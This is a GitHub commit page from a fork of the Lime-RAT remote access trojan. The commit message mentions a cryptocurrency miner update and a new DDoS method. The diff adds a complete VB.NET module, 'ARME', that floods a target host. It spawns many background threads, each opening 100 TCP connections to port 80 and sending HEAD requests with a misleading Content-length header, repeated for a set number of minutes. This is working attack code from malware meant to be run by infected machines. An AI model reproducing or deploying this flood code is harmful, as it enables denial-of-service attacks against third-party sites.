forked from NYAN-x-CAT/Lime-RAT
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1- Updated GeoIP.dat 2- Updated XMR [Smaller dll size, donatio=0] 3- Added new DDoS method [ARME] 4- Fixed small bugs
- Loading branch information
1 parent
b408705
commit 16712e8
Showing
31 changed files
with
258 additions
and
91 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,116 @@ | ||
Imports System.Collections.Generic | ||
Imports System.Text | ||
Imports System.Threading | ||
Imports System.Net.Sockets | ||
Imports System.Net | ||
Imports System.Diagnostics | ||
Public Module ARME | ||
|
||
Private ThreadsEnded = 0 | ||
Private PostDATA As String | ||
Private HostToAttack As String | ||
Private TimetoAttack As Integer | ||
Private ThreadstoUse As Integer | ||
Private Threads As Thread() | ||
Private AttackRunning As Boolean = False | ||
Private Attacks As Integer = 0 | ||
Public Sub StartARME(ByVal Host As String, ByVal Threadsto As Integer, ByVal Time As Integer, ByVal data As String) | ||
If Not AttackRunning = True Then | ||
AttackRunning = True | ||
HostToAttack = Host | ||
PostDATA = data | ||
ThreadstoUse = Threadsto | ||
TimetoAttack = Time * 60 | ||
|
||
If HostToAttack.Contains("http://") Then HostToAttack = HostToAttack.Replace("http://", String.Empty) | ||
If HostToAttack.Contains("www.") Then HostToAttack = HostToAttack.Replace("www.", String.Empty) | ||
If HostToAttack.Contains("/") Then HostToAttack = HostToAttack.Replace("/", String.Empty) | ||
|
||
|
||
Threads = New Thread(Threadsto - 1) {} | ||
STV("Flood", "ARME Attack on " & HostToAttack & " started!") | ||
For i As Integer = 0 To Threadsto - 1 | ||
Threads(i) = New Thread(AddressOf DoWork) | ||
Threads(i).IsBackground = True | ||
Threads(i).Start() | ||
Next | ||
|
||
Dim Stoped As New Threading.Thread(AddressOf StopARME) | ||
Stoped.Start() | ||
|
||
Else | ||
STV("Flood", "An ARME Attack is Already Running on " & HostToAttack) | ||
End If | ||
|
||
End Sub | ||
Private Sub lol() | ||
|
||
ThreadsEnded = ThreadsEnded + 1 | ||
If ThreadsEnded = ThreadstoUse Then | ||
ThreadsEnded = 0 | ||
ThreadstoUse = 0 | ||
AttackRunning = False | ||
STV("Flood", "ARME Attack on " & HostToAttack & " finished successfully. Attacks Sent: " & Attacks.ToString) | ||
Attacks = 0 | ||
End If | ||
|
||
End Sub | ||
|
||
Public Sub StopARME() | ||
|
||
1: | ||
If GTV("ARME|STOP") = "False" Then | ||
Thread.Sleep(1000) | ||
GoTo 1 | ||
End If | ||
|
||
|
||
If AttackRunning = True Then | ||
For i As Integer = 0 To ThreadstoUse - 1 | ||
Try | ||
Threads(i).Abort() | ||
Catch | ||
End Try | ||
Next | ||
AttackRunning = False | ||
|
||
STV("Flood", "ARME Attack on " & HostToAttack & " aborted successfully. Attacks Sent: " & Attacks.ToString) | ||
Attacks = 0 | ||
|
||
Else | ||
STV("Flood", "ARME Attack: Not Running!") | ||
End If | ||
End Sub | ||
|
||
Private Sub DoWork() | ||
Try | ||
Dim socketArray As Socket() = New Socket(100 - 1) {} | ||
Dim span As TimeSpan = TimeSpan.FromSeconds(CDbl(TimetoAttack)) | ||
Dim stopwatch As Stopwatch = Stopwatch.StartNew | ||
Do While (stopwatch.Elapsed < span) | ||
Try | ||
Dim i As Integer | ||
Dim Http As New WebClient() | ||
For i = 0 To 100 - 1 | ||
socketArray(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) | ||
socketArray(i).Connect(Dns.GetHostAddresses(HostToAttack), 80) | ||
socketArray(i).Send(ASCIIEncoding.Default.GetBytes("HEAD / HTTP/1.1" & ChrW(13) & ChrW(10) & "Host: " & HostToAttack.ToString() & ChrW(13) & ChrW(10) & "Content-length: 5235" & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10))) | ||
Attacks = Attacks + 1 | ||
Next i | ||
Dim j As Integer | ||
For j = 0 To 100 - 1 | ||
socketArray(j).Close() | ||
Next j | ||
Continue Do | ||
|
||
|
||
|
||
Catch | ||
|
||
Continue Do | ||
End Try | ||
Loop | ||
Catch : End Try | ||
lol() | ||
End Sub | ||
End Module |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
2 changes: 1 addition & 1 deletion
2
Project/Server/Classes/S_GIO.vb → Project/Server/Classes/S_GeoIP.vb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.
Oops, something went wrong.
Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.